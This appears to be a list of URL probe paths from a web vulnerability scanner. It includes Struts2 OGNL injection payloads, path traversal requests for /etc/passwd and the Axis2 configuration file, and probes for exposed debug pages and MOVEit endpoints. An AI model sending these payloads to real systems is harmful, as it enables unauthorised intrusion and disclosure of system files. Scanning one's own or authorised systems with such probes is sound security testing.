[/.query.json?statement=%2F%2F%2A]
[/?action%3Awatobo_%25%7B10000-1%7D]
[/?redirect%3Awatobo_%25%7B10000-1%7D]
[/?redirectAction%3Awatobo_%25%7B10000-1%7D]
[/elmah.axd]
[/MOVEitISAPI/MOVEitISAPI.dll?action=capa]
[/moveitisapi/moveitisapi.dll?action=download]
[/server-status/]
[/Trace.axd]
[/web.query.json?statement=%2F%2F%2A]
[/web?watobo=%25%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23writer.println%28%27INJ%27%2B%271645209911%27%29%2C%23writer.close%28%29%29%7D]
[/web?xsd=../../../../../../../etc/passwd]
[/web?xsd=../conf/axis2.xml]
